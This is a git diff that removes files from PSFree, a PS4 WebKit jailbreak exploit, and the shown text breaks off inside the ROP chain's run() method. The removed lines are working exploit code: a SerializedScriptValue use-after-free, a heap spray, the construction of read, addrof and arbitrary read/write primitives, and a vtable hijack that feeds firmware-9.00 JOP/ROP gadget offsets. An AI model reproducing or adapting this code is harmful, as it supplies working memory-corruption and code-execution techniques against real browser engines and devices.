-                addEventListener('popstate', onpopstate, {once: true});
-                history.back();
-            });
-        }
-
-        if (no_pop) {
-            pop = event;
-        } else {
-            pop2 = event;
-        }
-        resolves[idx][0]();
-    }
-
-    const pop_promise = new Promise((resolve, reject) => {
-        resolves.push([resolve, reject]);
-        addEventListener('popstate', onpopstate, {once: true});
-    });
-
-    function onblur(event) {
-        const target = event.target;
-        const is_input = target === input;
-        const idx = is_input ? 0 : 1;
-        log(`${target.id} blur came`);
-
-        if (blurs[idx] > 0)  {
-            die(`${name}: multiple blurs. blurs: ${blurs[idx]}`);
-        }
-
-        // we replace the URL with the original so the user can rerun the
-        // exploit via a reload. If we don't, the exploit will append another
-        // "#foo" to the URL and the input element will not be blurred because
-        // the foo element won't be scrolled to during history.back()
-        history.replaceState('state3', '', original_loc);
-
-        // free the SerializedScriptValue's neighbors and thus free the
-        // SmallLine where it resides
-        const fset_idx = is_input ? index : index2;
-        for (let i = fset_idx - num_adjs/2; i < fset_idx + num_adjs/2; i++) {
-            fsets[i].rows = '';
-            fsets[i].cols = '';
-        }
-
-        for (let i = 0; i < num_reuses; i++) {
-            const view = new Uint8Array(new ArrayBuffer(ssv_len));
-            view[0] = 0x41;
-            views.push(view);
-        }
-
-        blurs[idx]++;
-    }
-
-    input.addEventListener('blur', onblur);
-    foo.addEventListener('blur', onblur);
-
-    document.body.append(input);
-    document.body.append(foo);
-    document.body.append(bar);
-
-    // FrameLoader::loadInSameDocument() calls Document::statePopped().
-    // statePopped() will defer firing of popstate until we're in the complete
-    // state
-    //
-    // this means that onblur() will run with "state2" as the current history
-    // item if we call loadInSameDocument too early
-    log(`readyState now: ${document.readyState}`);
-
-    if (document.readyState !== 'complete') {
-        await new Promise(resolve => {
-            document.addEventListener('readystatechange', function foo() {
-                if (document.readyState === 'complete') {
-                    document.removeEventListener('readystatechange', foo);
-                    resolve();
-                }
-            });
-        });
-    }
-
-    log(`readyState now: ${document.readyState}`);
-
-    await new Promise(resolve => {
-        input.addEventListener('focus', resolve, {once: true});
-        input.focus();
-    });
-
-    history.back();
-    await pop_promise;
-    await pop_promise2;
-
-    log('done await popstate');
-
-    input.remove();
-    foo.remove();
-    bar.remove();
-
-    const res = [];
-    for (let i = 0; i < views.length; i++) {
-        const view = views[i];
-        if (view[0] !== 0x41) {
-            log(`view index: ${hex(i)}`);
-            log('found view:');
-            log(view);
-
-            // set SSV's refcount to 1, all other fields to 0/NULL
-            view[0] = 1;
-            view.fill(0, 1);
-
-            if (res.length) {
-                res[1] = [new BufferView(view.buffer), pop2];
-                break;
-            }
-
-            // return without keeping any references to pop, making it GC-able.
-            // its WebCore::PopStateEvent will then be freed on its death
-            res[0] = new BufferView(view.buffer);
-            i = num_reuses - 1;
-        }
-    }
-
-    if (res.length !== 2) {
-        die('failed SerializedScriptValue UAF');
-    }
-    return res;
-}
-
-class Reader {
-    constructor(rstr, rstr_view) {
-        this.rstr = rstr;
-        this.rstr_view = rstr_view;
-        this.m_data = rstr_view.read64(off.strimpl_m_data);
-    }
-
-    read8_at(offset) {
-        return this.rstr.charCodeAt(offset);
-    }
-
-    read32_at(offset) {
-        const str = this.rstr;
-        return (
-            str.charCodeAt(offset)
-            | str.charCodeAt(offset + 1) << 8
-            | str.charCodeAt(offset + 2) << 16
-            | str.charCodeAt(offset + 3) << 24
-        ) >>> 0;
-    }
-
-    read64_at(offset) {
-        return sread64(this.rstr, offset);
-    }
-
-    read64(addr) {
-        this.rstr_view.write64(off.strimpl_m_data, addr);
-        return sread64(this.rstr, 0);
-    }
-
-    set_addr(addr) {
-        this.rstr_view.write64(off.strimpl_m_data, addr);
-    }
-
-    // remember to use this to fix up the StringImpl before freeing it
-    restore() {
-        this.rstr_view.write64(off.strimpl_m_data, this.m_data);
-        this.rstr_view.write32(off.strimpl_strlen, original_strlen);
-    }
-}
-
-// we now have a double free on the fastMalloc heap
-async function make_rdr(view) {
-    let str_wait = 0;
-    const strs = [];
-    const u32 = new Uint32Array(1);
-    const u8 = new Uint8Array(u32.buffer);
-    const marker_offset = original_strlen - 4;
-    const pad = 'B'.repeat(marker_offset);
-
-    log('start string spray');
-    while (true) {
-        for (let i = 0; i < num_strs; i++) {
-            u32[0] = i;
-            // on versions like 8.0x:
-            // * String.fromCharCode() won't create a 8-bit string. so we use
-            //   fromCodePoint() instead
-            // * Array.prototype.join() won't try to convert 16-bit strings to
-            //   8-bit
-            //
-            // given the restrictions above, we will ensure "str" is always a
-            // 8-bit string. you can check a WebKit source code (e.g. on 8.0x)
-            // to see that String.prototype.repeat() will create a 8-bit string
-            // if the repeated string's length is 1
-            //
-            // Array.prototype.join() calls JSC::JSStringJoiner::join(). it
-            // returns a plain JSString (not a JSRopeString). that means we
-            // have allocated a WTF::StringImpl with the proper size and whose
-            // string data is inlined
-            const str = [pad, String.fromCodePoint(...u8)].join('');
-            strs.push(str);
-        }
-
-        if (view.read32(off.strimpl_inline_str) === 0x42424242) {
-            view.write32(off.strimpl_strlen, 0xffffffff);
-            break;
-        }
-
-        strs.length = 0;
-        gc();
-        await sleep();
-        str_wait++;
-    }
-    log(`JSString reused memory at loop: ${str_wait}`);
-
-    const idx = view.read32(off.strimpl_inline_str + marker_offset);
-    log(`str index: ${hex(idx)}`);
-    log('view:');
-    log(view);
-
-    // versions like 8.0x have a JSC::JSString that have their own m_length
-    // field. strings consult that field instead of the m_length of their
-    // StringImpl
-    //
-    // we work around this by passing the string to Error.
-    // ErrorInstance::create() will then create a new JSString initialized from
-    // the StringImpl of the message argument
-    const rstr = Error(strs[idx]).message;
-    log(`str len: ${hex(rstr.length)}`);
-    if (rstr.length === 0xffffffff) {
-        log('confirmed correct leaked');
-        const addr = (
-            view.read64(off.strimpl_m_data)
-            .sub(off.strimpl_inline_str)
-        );
-        log(`view's buffer address: ${addr}`);
-        return new Reader(rstr, view);
-    }
-    die("JSString wasn't modified");
-}
-
-// we will create a JSC::CodeBlock whose m_constantRegisters is set to an array
-// of JSValues whose size is ssv_len. the undefined constant is automatically
-// added due to reasons such as "undefined is returned by default if the
-// function exits without returning anything"
-const cons_len = ssv_len - 8*5;
-const bt_offset = 0;
-const idx_offset = ssv_len - 8*3;
-const strs_offset = ssv_len - 8*2;
-const src_part = (() => {
-    // we user var instead of let/const since such variables always get
-    // initialized to the NULL JSValue even if you immediately return. we will
-    // make functions that do as little as possible in order to speed up the
-    // exploit. m_constantRegisters will still contain the unused constants
-    //
-    // function foo() {
-    //     return;
-    //     let a = 1;
-    // }
-    //
-    // the resulting bytecode:
-    // bb#1
-    // [   0] enter
-    // [   1] get_scope          loc4
-    // [   3] mov                loc5, loc4
-    // [   6] check_traps
-    // // this part still initializes a with the NULL JSValue
-    // [   7] mov                loc6, (const0)
-    // [  10] ret                Undefined(const1)
-    // Successors: [ ]
-    //
-    // bb#2
-    // [  12] mov                loc6, Int32: 1(const2)
-    // [  15] ret                Undefined(const1)
-    // Successors: [ ]
-    //
-    //
-    // Constants:
-    //    k0 = 
-    //    k1 = Undefined
-    //    k2 = Int32: 1: in source as integer
-    let res = 'var f = 0x11223344;\n';
-    // make unique constants that won't collide with the possible marker values
-    for (let i = 0; i < cons_len; i += 8) {
-        res += `var a${i} = ${num_leaks + i};\n`;
-    }
-    return res;
-})();
-
-async function leak_code_block(reader, bt_size) {
-    const rdr = reader;
-    const bt = [];
-    // take into account the cell and indexing header of the immutable
-    // butterfly
-    for (let i = 0; i < bt_size - 0x10; i += 8) {
-        bt.push(i);
-    }
-
-    // cache the global variable resolution
-    const slen = ssv_len;
-
-    const bt_part = `var bt = [${bt}];\nreturn bt;\n`;
-    const part = bt_part + src_part;
-    const cache = [];
-    for (let i = 0; i < num_leaks; i++) {
-        cache.push(part + `var idx = ${i};\nidx\`foo\`;`);
-    }
-
-    const chunkSize = (is_ps4 && version < 0x900) ? 128 * KB : 1 * MB;
-    const smallPageSize = 4 * KB;
-    const search_addr = align(rdr.m_data, chunkSize);
-    log(`search addr: ${search_addr}`);
-
-    log(`func_src:\n${cache[0]}\nfunc_src end`);
-    log('start find CodeBlock');
-    let winning_off = null;
-    let winning_idx = null;
-    let winning_f = null;
-    let find_cb_loop = 0;
-    // false positives
-    let fp = 0;
-    rdr.set_addr(search_addr);
-    loop: while (true) {
-        const funcs = [];
-        for (let i = 0; i < num_leaks; i++) {
-            const f = Function(cache[i]);
-            // the first call allocates the CodeBlock
-            f();
-            funcs.push(f);
-        }
-
-        for (let p = 0; p < chunkSize; p += smallPageSize) {
-            for (let i = p; i < p + smallPageSize; i += slen) {
-                if (rdr.read32_at(i + 8) !== 0x11223344) {
-                    continue;
-                }
-
-                rdr.set_addr(rdr.read64_at(i + strs_offset));
-                const m_type = rdr.read8_at(5);
-                // make sure we're not reading the constant registers of an
-                // UnlinkedCodeBlock. those have JSTemplateObjectDescriptors.
-                // CodeBlock converts those to JSArrays
-                if (m_type !== 0) {
-                    rdr.set_addr(search_addr);
-                    winning_off = i;
-                    winning_idx = rdr.read32_at(i + idx_offset);
-                    winning_f = funcs[winning_idx];
-                    break loop;
-                }
-                rdr.set_addr(search_addr);
-                fp++;
-            }
-        }
-
-        find_cb_loop++;
-        gc();
-        await sleep();
-    }
-    log(`loop ${find_cb_loop} winning_off: ${hex(winning_off)}`);
-    log(`winning_idx: ${hex(winning_idx)} false positives: ${fp}`);
-
-    log('CodeBlock.m_constantRegisters.m_buffer:');
-    rdr.set_addr(search_addr.add(winning_off));
-    for (let i = 0; i < slen; i += 8) {
-        log(`${rdr.read64_at(i)} | ${hex(i)}`);
-    }
-
-    const bt_addr = rdr.read64_at(bt_offset);
-    const strs_addr = rdr.read64_at(strs_offset);
-    log(`immutable butterfly addr: ${bt_addr}`);
-    log(`string array passed to tag addr: ${strs_addr}`);
-
-    log('JSImmutableButterfly:');
-    rdr.set_addr(bt_addr);
-    for (let i = 0; i < bt_size; i += 8) {
-        log(`${rdr.read64_at(i)} | ${hex(i)}`);
-    }
-
-    log('string array:');
-    rdr.set_addr(strs_addr);
-    for (let i = 0; i < off.size_jsobj; i += 8) {
-        log(`${rdr.read64_at(i)} | ${hex(i)}`);
-    }
-
-    return [winning_f, bt_addr, strs_addr];
-}
-
-// data to write to the SerializedScriptValue
-//
-// setup to make deserialization create an ArrayBuffer with an arbitrary buffer
-// address
-function make_ssv_data(ssv_buf, view, view_p, addr, size) {
-    // sizeof JSC::ArrayBufferContents
-    const size_abc = (() => {
-        if (is_ps4) {
-            return version >= 0x900 ? 0x18 : 0x20;
-        } else {
-            return version >= 0x300 ? 0x18 : 0x20;
-        }
-    })();
-
-    const data_len = 9;
-    // sizeof WTF::Vector
-    const size_vector = 0x10;
-
-    // SSV offsets
-    const off_m_data = 8;
-    const off_m_abc = 0x18;
-    // view offsets
-    const voff_vec_abc = 0; // Vector
-    const voff_abc = voff_vec_abc + size_vector; // ArrayBufferContents
-    const voff_data = voff_abc + size_abc;
-
-    // WTF::Vector
-    // write m_data
-    // m_buffer
-    ssv_buf.write64(off_m_data, view_p.add(voff_data));
-    // m_capacity
-    ssv_buf.write32(off_m_data + 8, data_len);
-    // m_size
-    ssv_buf.write64(off_m_data + 0xc, data_len);
-
-    // 6 is the serialization format version number for ps4 6.00. The format
-    // is backwards compatible and using a value less than the current version
-    // number used by a specific WebKit version is considered valid.
-    //
-    // See CloneDeserializer::isValid() from
-    // WebKit/Source/WebCore/bindings/js/SerializedScriptValue.cpp at PS4 8.0x.
-    const CurrentVersion = 6;
-    const ArrayBufferTransferTag = 23;
-    view.write32(voff_data, CurrentVersion);
-    view[voff_data + 4] = ArrayBufferTransferTag;
-    view.write32(voff_data + 5, 0);
-
-    // std::unique_ptr>
-    // write m_arrayBufferContentsArray
-    ssv_buf.write64(off_m_abc, view_p.add(voff_vec_abc));
-    // write WTF::Vector
-    view.write64(voff_vec_abc, view_p.add(voff_abc));
-    view.write32(voff_vec_abc + 8, 1);
-    view.write32(voff_vec_abc + 0xc, 1);
-
-    if (size_abc === 0x20) {
-        // m_destructor, offset 0, leave as 0
-        // m_shared, offset 8, leave as 0
-        // m_data
-        view.write64(voff_abc + 0x10, addr);
-        // m_sizeInBytes
-        view.write32(voff_abc + 0x18, size);
-    } else {
-        // m_data
-        view.write64(voff_abc + 0, addr);
-        // m_destructor (48 bits), offset 8, leave as 0
-        // m_shared (48 bits), offset 0xe, leave as 0
-        // m_sizeInBytes
-        view.write32(voff_abc + 0x14, size);
-    }
-}
-
-async function make_arw(reader, view2, pop) {
-    const rdr = reader;
-
-    // we have to align the fake object to atomSize (16) else the process
-    // crashes. we don't know why
-    //
-    // since cells (GC memory chunks) are always aligned to atomSize, there
-    // might be code that's assuming that all GC pointers are aligned
-    //
-    // see atomSize from WebKit/Source/JavaScriptCore/heap/MarkedBlock.h at
-    // PS4 8.0x
-    const fakeobj_off = 0x20;
-    const fakebt_base = fakeobj_off + off.size_jsobj;
-    // sizeof JSC::IndexingHeader
-    const indexingHeader_size = 8;
-    // sizeof JSC::ArrayStorage
-    const arrayStorage_size = 0x18;
-    // there's only the .raw property
-    const propertyStorage = 8;
-    const fakebt_off = fakebt_base + indexingHeader_size + propertyStorage;
-
-    log('STAGE: leak CodeBlock');
-    // has too be greater than 0x10. the size of JSImmutableButterfly
-    const bt_size = 0x10 + fakebt_off + arrayStorage_size;
-    const [func, bt_addr, strs_addr] = await leak_code_block(rdr, bt_size);
-
-    const view = rdr.rstr_view;
-    const view_p = rdr.m_data.sub(off.strimpl_inline_str);
-    const view_save = new Uint8Array(view);
-
-    view.fill(0);
-    make_ssv_data(view2, view, view_p, bt_addr, bt_size);
-
-    const bt = new BufferView(pop.state);
-    view.set(view_save);
-
-    log('ArrayBuffer pointing to JSImmutableButterfly:');
-    for (let i = 0; i < bt.byteLength; i += 8) {
-        log(`${bt.read64(i)} | ${hex(i)}`);
-    }
-
-    // the immutable butterfly's indexing type is ArrayWithInt32 so
-    // JSImmutableButterfly::visitChildren() won't ask the GC to scan its slots
-    // for JSObjects to recursively visit. this means that we can write
-    // anything to the the butterfly's data area without fear of a GC crash
-
-    const val_true = 7; // JSValue of "true"
-    const strs_cell = rdr.read64(strs_addr);
-
-    bt.write64(fakeobj_off, strs_cell);
-    bt.write64(fakeobj_off + off.js_butterfly, bt_addr.add(fakebt_off));
-
-    // since .raw is the first ever created property, it's just besides the
-    // indexing header
-    bt.write64(fakebt_off - 0x10, val_true);
-    // indexing header's publicLength and vectorLength
-    bt.write32(fakebt_off - 8, 1);
-    bt.write32(fakebt_off - 8 + 4, 1);
-
-    // custom ArrayStorage that allows read/write to index 0. we have to use an
-    // ArrayStorage because the structure assigned to the structure ID expects
-    // one so visitButterfly() will crash if we try to fake the object with a
-    // regular butterfly
-
-    // m_sparseMap
-    bt.write64(fakebt_off, 0);
-    // m_indexBias
-    bt.write32(fakebt_off + 8, 0);
-    // m_numValuesInVector
-    bt.write32(fakebt_off + 0xc, 1);
-
-    // m_vector[0]
-    bt.write64(fakebt_off + 0x10, val_true);
-
-    // immutable_butterfly[0] = fakeobj;
-    bt.write64(0x10, bt_addr.add(fakeobj_off));
-
-    const fake = func()[0];
-    log(`fake.raw: ${fake.raw}`);
-    log(`fake[0]: ${fake[0]}`);
-    log(`fake: [${fake}]`);
-
-    const test_val = 3;
-    log(`test setting fake[0] to ${test_val}`);
-    fake[0] = test_val;
-    if (fake[0] !== test_val) {
-        die(`unexpected fake[0]: ${fake[0]}`);
-    }
-
-    function addrof(obj) {
-        fake[0] = obj;
-        return bt.read64(fakebt_off + 0x10);
-    }
-
-    // m_mode = WastefulTypedArray, allocated buffer on the fastMalloc heap,
-    // unlike FastTypedArray, where the buffer is managed by the GC. This
-    // prevents random crashes.
-    //
-    // See JSGenericTypedArrayView::visitChildren() from
-    // WebKit/Source/JavaScriptCore/runtime/JSGenericTypedArrayViewInlines.h at
-    // PS4 8.0x.
-    const worker = new DataView(new ArrayBuffer(1));
-    const main_template = new Uint32Array(new ArrayBuffer(off.size_view));
-
-    const leaker = {addr: null, 0: 0};
-
-    const worker_p = addrof(worker);
-    const main_p = addrof(main_template);
-    const leaker_p = addrof(leaker);
-
-    // we'll fake objects using a JSArrayBufferView whose m_mode is
-    // FastTypedArray. it's safe to use its buffer since it's GC-allocated. the
-    // current fastSizeLimit is 1000. if the length is less than or equal to
-    // that, we get a FastTypedArray
-    const scaled_sview = off.size_view / 4;
-    const faker = new Uint32Array(scaled_sview);
-    const faker_p = addrof(faker);
-    const faker_vector = rdr.read64(faker_p.add(off.view_m_vector));
-
-    const vector_idx = off.view_m_vector / 4;
-    const length_idx = off.view_m_length / 4;
-    const mode_idx = off.view_m_mode / 4;
-    const bt_idx = off.js_butterfly / 4;
-
-    // fake a Uint32Array using GC memory
-    faker[vector_idx] = worker_p.lo;
-    faker[vector_idx + 1] = worker_p.hi;
-    faker[length_idx] = scaled_sview;
-
-    rdr.set_addr(main_p);
-    faker[mode_idx] = rdr.read32_at(off.view_m_mode);
-    // JSCell
-    faker[0] = rdr.read32_at(0);
-    faker[1] = rdr.read32_at(4);
-    faker[bt_idx] = rdr.read32_at(off.js_butterfly);
-    faker[bt_idx + 1] = rdr.read32_at(off.js_butterfly + 4);
-
-    // fakeobj()
-    bt.write64(fakebt_off + 0x10, faker_vector);
-    const main = fake[0];
-
-    log('main (pointing to worker):');
-    for (let i = 0; i < off.size_view; i += 8) {
-        const idx = i / 4;
-        log(`${new Int(main[idx], main[idx + 1])} | ${hex(i)}`);
-    }
-
-    new Memory(
-        main, worker, leaker,
-        leaker_p.add(off.js_inline_prop),
-        rdr.read64(leaker_p.add(off.js_butterfly)),
-    );
-    log('achieved arbitrary r/w');
-
-    rdr.restore();
-    // set the refcount to a high value so we don't free the memory, view's
-    // death will already free it (a StringImpl is currently using the memory)
-    view.write32(0, -1);
-    // ditto (a SerializedScriptValue is currently using the memory)
-    view2.write32(0, -1);
-    // we don't want its death to call fastFree() on GC memory
-    make_arw._buffer = bt.buffer;
-}
-
-async function main() {
-    log('STAGE: UAF SSV');
-    const [fsets, indices] = prepare_uaf();
-    const [view, [view2, pop]] = await uaf_ssv(fsets, indices[1], indices[0]);
-
-    log('STAGE: get string relative read primitive');
-    const rdr = await make_rdr(view);
-
-    for (const fset of fsets) {
-        fset.rows = '';
-        fset.cols = '';
-    }
-
-    log('STAGE: achieve arbitrary read/write primitive');
-    await make_arw(rdr, view2, pop);
-
-    clear_log();
-    // path to your script that will use the exploit
-    import('./lapse.mjs');
-}
-main();
diff --git a/psfree/psfree_lapse.cache b/psfree/psfree_lapse.cache
deleted file mode 100644
index c161cc2..0000000
--- a/psfree/psfree_lapse.cache
+++ /dev/null
@@ -1,31 +0,0 @@
-CACHE MANIFEST 
-# PSFree-Lapse
-
-about.html
-alert.mjs
-cache.html
-config.mjs
-index.html
-lapse.mjs
-payload.bin
-payload.js
-psfree.mjs
-fonts\LiberationMono-Regular.ttf
-kpatch\900.elf
-module\chain.mjs
-module\constants.mjs
-module\int64.mjs
-module\mem.mjs
-module\memtools.mjs
-module\offset.mjs
-module\rw.mjs
-module\utils.mjs
-module\view.mjs
-rop\900.mjs
-
-NETWORK:
-*
-
-SETTINGS:
-prefer-online:
-
diff --git a/psfree/rop/900.mjs b/psfree/rop/900.mjs
deleted file mode 100644
index 8ea3b87..0000000
--- a/psfree/rop/900.mjs
+++ /dev/null
@@ -1,374 +0,0 @@
-/* Copyright (C) 2024 anonymous
-
-This file is part of PSFree.
-
-PSFree is free software: you can redistribute it and/or modify
-it under the terms of the GNU Affero General Public License as
-published by the Free Software Foundation, either version 3 of the
-License, or (at your option) any later version.
-
-PSFree is distributed in the hope that it will be useful,
-but WITHOUT ANY WARRANTY; without even the implied warranty of
-MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-GNU Affero General Public License for more details.
-
-You should have received a copy of the GNU Affero General Public License
-along with this program.  If not, see .  */
-
-// by janisslsm (John) from ps4-dev discord
-
-import { log } from '../module/utils.mjs';
-import { mem } from '../module/mem.mjs';
-import { KB} from '../module/constants.mjs';
-import { ChainBase } from '../module/chain.mjs';
-
-import {
-    find_base,
-    get_view_vector,
-    resolve_import,
-    init_syscall_array,
-} from '../module/memtools.mjs';
-
-import * as rw from '../module/rw.mjs';
-
-const origin = window.origin;
-const port = '8000';
-const url = `${origin}:${port}`;
-
-const syscall_array = [];
-
-const offset_textarea_impl = 0x18;
-
-// WebKit offsets of imported functions
-const offset_wk_stack_chk_fail = 0x178;
-const offset_wk_memcpy = 0x188;
-
-// libSceNKWebKit.sprx
-export let libwebkit_base = null;
-// libkernel_web.sprx
-export let libkernel_base = null;
-// libSceLibcInternal.sprx
-export let libc_base = null;
-
-// Chain implementation based on Chain803. Replaced offsets that changed
-// between versions. Replaced gadgets that were missing with new ones that
-// won't change the API.
-//
-// gadgets for the JOP chain
-//
-// Why these JOP chain gadgets are not named jop1-3 and jop2-5 not jop4-7 is
-// because jop1-5 was the original chain used by the old implementation of
-// Chain803. Now the sequence is ta_jop1-3 then to jop2-5.
-//
-// When the scrollLeft getter native function is called on PS4 9.00, rsi is the
-// JS wrapper for the WebCore textarea class.
-const ta_jop1 = `
-mov rdi, qword ptr [rsi + 0x18]
-mov rax, qword ptr [rdi]
-call qword ptr [rax + 0xb8]
-`;
-// Since the method of code redirection we used is via redirecting a call to
-// jump to our JOP chain, we have the return address of the caller on entry.
-//
-// ta_jop1 pushed another object (via the call instruction) but we want no
-// extra objects between the return address and the rbp that will be pushed by
-// jop2 later. So we pop the return address pushed by ta_jop1.
-//
-// This will make pivoting back easy, just "leave; ret".
-const ta_jop2 = `
-pop rsi
-jmp qword ptr [rax + 0x1c]
-`;
-const ta_jop3 = `
-mov rdi, qword ptr [rax + 8]
-mov rax, qword ptr [rdi]
-jmp qword ptr [rax + 0x30]
-`;
-// rbp is now pushed, any extra objects pushed by the call instructions can be
-// ignored
-const jop2 = `
-push rbp
-mov rbp, rsp
-mov rax, qword ptr [rdi]
-call qword ptr [rax + 0x58]
-`;
-const jop3 = `
-mov rdx, qword ptr [rax + 0x18]
-mov rax, qword ptr [rdi]
-call qword ptr [rax + 0x10]
-`;
-const jop4 = `
-push rdx
-jmp qword ptr [rax]
-`;
-const jop5 = 'pop rsp; ret';
-
-// the ps4 firmware is compiled to use rbp as a frame pointer
-//
-// The JOP chain pushed rbp and moved rsp to rbp before the pivot. The chain
-// must save rbp (rsp before the pivot) somewhere if it uses it. The chain must
-// restore rbp (if needed) before the epilogue.
-//
-// The epilogue will move rbp to rsp (restore old rsp) and pop rbp (which we
-// pushed earlier before the pivot, thus restoring the old rbp).
-//
-// leave instruction equivalent:
-//     mov rsp, rbp
-//     pop rbp
-const rop_epilogue = 'leave; ret';
-
-const webkit_gadget_offsets = new Map(Object.entries({
-    'pop rax; ret' : 0x0000000000051a12, // `58 c3`
-    'pop rbx; ret' : 0x00000000000be5d0, // `5b c3`
-    'pop rcx; ret' : 0x00000000000657b7, // `59 c3`
-    'pop rdx; ret' : 0x000000000000986c, // `5a c3`
-
-    'pop rbp; ret' : 0x00000000000000b6, // `5d c3`
-    'pop rsi; ret' : 0x000000000001f4d6, // `5e c3`
-    'pop rdi; ret' : 0x0000000000319690, // `5f c3`
-    'pop rsp; ret' : 0x000000000004e293, // `5c c3`
-
-    'pop r8; ret' : 0x00000000001a7ef1, // `47 58 c3`
-    'pop r9; ret' : 0x0000000000422571, // `47 59 c3`
-    'pop r10; ret' : 0x0000000000e9e1d1, // `47 5a c3`
-    'pop r11; ret' : 0x00000000012b1d51, // `47 5b c3`
-
-    'pop r12; ret' : 0x000000000085ec71, // `47 5c c3`
-    'pop r13; ret' : 0x00000000001da461, // `47 5d c3`
-    'pop r14; ret' : 0x0000000000685d73, // `47 5e c3`
-    'pop r15; ret' : 0x00000000006ab3aa, // `47 5f c3`
-
-    'ret' : 0x0000000000000032, // `c3`
-    'leave; ret' : 0x000000000008db5b, // `c9 c3`
-
-    'mov rax, qword ptr [rax]; ret' : 0x00000000000241cc, // `48 8b 00 c3`
-    'mov qword ptr [rdi], rax; ret' : 0x000000000000613b, // `48 89 07 c3`
-    'mov dword ptr [rdi], eax; ret' : 0x000000000000613c, // `89 07 c3`
-    'mov dword ptr [rax], esi; ret' : 0x00000000005c3482, // `89 30 c3`
-  
-
-    [jop2] : 0x0000000000683800,
-    [jop3] : 0x0000000000303906,
-    [jop4] : 0x00000000028bd332,
-    [jop5] : 0x000000000004e293,
-
-    [ta_jop1] : 0x00000000004e62a4,
-    [ta_jop2] : 0x00000000021fce7e,
-    [ta_jop3] : 0x00000000019becb4,
-}));
-
-const libc_gadget_offsets = new Map(Object.entries({
-    'getcontext' : 0x24f04,
-    'setcontext' : 0x29448,
-}));
-
-const libkernel_gadget_offsets = new Map(Object.entries({
-    // returns the location of errno
-    '__error' : 0xCB80,
-}));
-
-export const gadgets = new Map();
-
-function get_bases() {
-    const textarea = document.createElement('textarea');
-    const webcore_textarea = mem.addrof(textarea).readp(offset_textarea_impl);
-    const textarea_vtable = webcore_textarea.readp(0);
-    const libwebkit_base = find_base(textarea_vtable, true, true);
-
-    const stack_chk_fail_import =
-        libwebkit_base
-        .add(offset_wk_stack_chk_fail)
-    ;
-    const stack_chk_fail_addr = resolve_import(
-        stack_chk_fail_import,
-        true,
-        true
-    );
-    const libkernel_base = find_base(stack_chk_fail_addr, true, true);
-
-    const memcpy_import = libwebkit_base.add(offset_wk_memcpy);
-    const memcpy_addr = resolve_import(memcpy_import, true, true);
-    const libc_base = find_base(memcpy_addr, true, true);
-
-    return [
-        libwebkit_base,
-        libkernel_base,
-        libc_base,
-    ];
-}
-
-export function init_gadget_map(gadget_map, offset_map, base_addr) {
-    for (const [insn, offset] of offset_map) {
-        gadget_map.set(insn, base_addr.add(offset));
-    }
-}
-
-class Chain900Base extends ChainBase {
-    constructor() {
-        super();
-
-        // for conditional jumps
-        this._clean_branch_ctx();
-        this.flag = new Uint8Array(8);
-        this.flag_addr = get_view_vector(this.flag);
-        this.jmp_target = new Uint8Array(0x100);
-        rw.write64(this.jmp_target, 0x1c, this.get_gadget(jop4));
-        rw.write64(this.jmp_target, 0, this.get_gadget(jop5));
-
-        // for save/restore
-        this.is_saved = false;
-        this.is_stale = false;
-        this.position = 0;
-        const jmp_buf_size = 0xc8;
-        this.jmp_buf = new Uint8Array(jmp_buf_size);
-        this.jmp_buf_p = get_view_vector(this.jmp_buf);
-    }
-
-    // sequence to pivot back and return
-    push_end() {
-        this.push_gadget(rop_epilogue);
-    }
-
-    check_is_branching() {
-        if (this.is_branch_ctx) {
-            throw Error('chain is still branching, end it before running');
-        }
-    }
-
-    push_value(value) {
-        super.push_value(value);
-
-        if (this.is_branch_ctx) {
-            this.branch_position += 8;
-        }
-    }
-
-    _clean_branch_ctx() {
-        this.is_branch_ctx = false;
-        this.branch_position = null;
-        this.delta_slot = null;
-        this.rsp_slot = null;
-        this.rsp_position = null;
-    }
-
-    clean() {
-        super.clean();
-        this._clean_branch_ctx();
-        this.is_saved = false;
-        this.is_stale = false;
-        this.position = 0;
-    }
-
-    push_get_retval() {
-        this.push_gadget('pop rdi; ret');
-        this.push_value(this.retval_addr);
-        this.push_gadget('mov qword ptr [rdi], rax; ret');
-    }
-
-        push_clear_errno() {
-        this.push_call(this.get_gadget('__error'));
-        this.push_gadget('pop rsi; ret');
-        this.push_value(0);
-        this.push_gadget('mov dword ptr [rax], esi; ret');
-    }
-
-        push_get_errno() {
-        this.push_gadget('pop rdi; ret');
-        this.push_value(this.errno_addr);
-
-        this.push_call(this.get_gadget('__error'));
-
-        this.push_gadget('mov rax, qword ptr [rax]; ret');
-        this.push_gadget('mov dword ptr [rdi], eax; ret');
-    }
-
-        check_stale() {
-        if (this.is_stale) {
-            throw Error('chain already ran, clean it first');
-        }
-        this.is_stale = true;
-    }
-        check_is_empty() {
-        if (this.position === 0) {
-            throw Error('chain is empty');
-        }
-    }
-}
-
-// Chain for PS4 9.00
-export class Chain900 extends Chain900Base {
-    constructor() {
-        super();
-
-        const textarea = document.createElement('textarea');
-        this.textarea = textarea;
-        const js_ta = mem.addrof(textarea);
-        const webcore_ta = js_ta.readp(0x18);
-        this.webcore_ta = webcore_ta;
-        // Only offset 0x1c8 will be used when calling the scrollLeft getter
-        // native function (our tests don't crash).
-        //
-        // This implies we don't need to know the exact size of the vtable and
-        // try to copy it as much as possible to avoid a crash due to missing
-        // vtable entries.
-        //
-        // So the rest of the vtable are free for our use.
-        const vtable = new Uint8Array(0x200);
-        const old_vtable_p = webcore_ta.readp(0);
-        this.vtable = vtable;
-        this.old_vtable_p = old_vtable_p;
-
-        // 0x1b8 is the offset of the scrollLeft getter native function
-        rw.write64(vtable, 0x1b8, this.get_gadget(ta_jop1));
-        rw.write64(vtable, 0xb8, this.get_gadget(ta_jop2));
-        rw.write64(vtable, 0x1c, this.get_gadget(ta_jop3));
-
-        // for the JOP chain
-        const rax_ptrs = new Uint8Array(0x100);
-        const rax_ptrs_p = get_view_vector(rax_ptrs);
-        this.rax_ptrs = rax_ptrs;
-
-        rw.write64(rax_ptrs, 0x30, this.get_gadget(jop2));
-        rw.write64(rax_ptrs, 0x58, this.get_gadget(jop3));
-        rw.write64(rax_ptrs, 0x10, this.get_gadget(jop4));
-        rw.write64(rax_ptrs, 0, this.get_gadget(jop5));
-        // value to pivot rsp to
-        rw.write64(this.rax_ptrs, 0x18, this.stack_addr);
-
-        const jop_buffer = new Uint8Array(8);
-        const jop_buffer_p = get_view_vector(jop_buffer);
-        this.jop_buffer = jop_buffer;
-
-        rw.write64(jop_buffer, 0, rax_ptrs_p);
-
-        rw.write64(vtable, 8, jop_buffer_p);
-    }
-
-    run() {
-        this.check_stale();
-        this.check_is_empty();
-        this.check_is_branching();
-
